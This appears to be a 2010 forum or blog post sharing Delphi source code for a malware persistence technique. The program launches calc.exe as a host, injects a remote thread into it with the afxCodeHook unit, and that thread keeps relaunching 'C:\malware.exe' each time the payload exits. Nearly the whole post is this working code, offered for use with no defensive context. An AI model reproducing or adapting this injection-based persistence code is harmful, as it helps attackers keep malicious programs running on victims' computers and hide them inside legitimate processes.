Simple Persistence Example

Post date: May 30, 2010 11:52:14 PM

Persistence ensures that when the application is closed, it will execute itself again through an injected thread into a host application.

{

Simple Persistance Example 2 by Slayer616

Thanks to : Aphex for his great injection unit - afxcodehook!

Zacherl for the idea to improve the injected function with WaitForSingleObject

}

program RemExec;

uses

  Windows,

  afxCodeHook,shellapi;

type

  TRemoteInfo = record

    WaitForSingleObject:function (hHandle: THandle; dwMilliseconds: DWORD): DWORD; stdcall;

    LoadLibrary: function(lpLibFileName: PChar): HMODULE; stdcall;

    GetProcAddress: function(hModule: HMODULE; lpProcName: LPCSTR): FARPROC; stdcall;

    ShellExecuteEx:function (lpExecInfo: PShellExecuteInfo):BOOL; stdcall;

    shell32:pchar;

    sFile:pchar;

    Shellexecs:pchar;

    sCar:cardinal;

  end;

procedure RemoteThread(RemoteInfo: pointer); stdcall;

var

  ShExecInfo : SHELLEXECUTEINFO;

begin

  with TRemoteInfo(RemoteInfo^) do

  begin

     @ShellexecuteEx := GetProcAddress(LoadLibrary(shell32), shellexecs);

    while true do begin

      ShExecInfo.cbSize := sizeof(SHELLEXECUTEINFO);

      ShExecInfo.fMask := SEE_MASK_NOCLOSEPROCESS;

      ShExecInfo.lpVerb := nil;

      ShExecInfo.lpFile := sFile;

      ShExecInfo.lpDirectory := nil;

      shexecinfo.lpParameters := nil;

      ShExecInfo.nShow := 1;

      ShellExecuteEx(@ShExecInfo);

      sCar := ShExecInfo.hProcess;

      WaitForSingleObject(sCar, INFINITE);

    end;

  end;

end;

procedure RemoteExecute;

const

  Files:pchar = 'C:\malware.exe';

  shell32:pchar = 'shell32';

  ShellExecs:pchar = 'ShellExecuteEx';

var

  RemoteInfo: TRemoteInfo;

  Process: dword;

  StartInfo: TStartupInfo;

  ProcInfo: TProcessInformation;

begin

  ZeroMemory(@StartInfo, SizeOf(TStartupInfo));

  StartInfo.cb := SizeOf(TStartupInfo);

  CreateProcess(nil, 'calc.exe', nil, nil, False, 0, nil, nil, StartInfo, ProcInfo);

  Process := ProcInfo.hProcess;

  Remoteinfo.Shell32 := injectstring(process,shell32);

  Remoteinfo.ShellExecs := injectstring(process,ShellExecs);

  RemoteInfo.sFile := InjectString(Process, Files);

  @RemoteInfo.LoadLibrary := GetProcAddress(GetModuleHandle('kernel32'), 'LoadLibraryA');

  @RemoteInfo.GetProcAddress := GetProcAddress(GetModuleHandle('kernel32'), 'GetProcAddress');

  @RemoteInfo.WaitForSingleObject  := GetProcAddress(GetModuleHandle('kernel32'), 'WaitForSingleObject');

  InjectThread(Process, @RemoteThread, @RemoteInfo, SizeOf(TRemoteInfo), True);

end;

begin

  RemoteExecute;

end.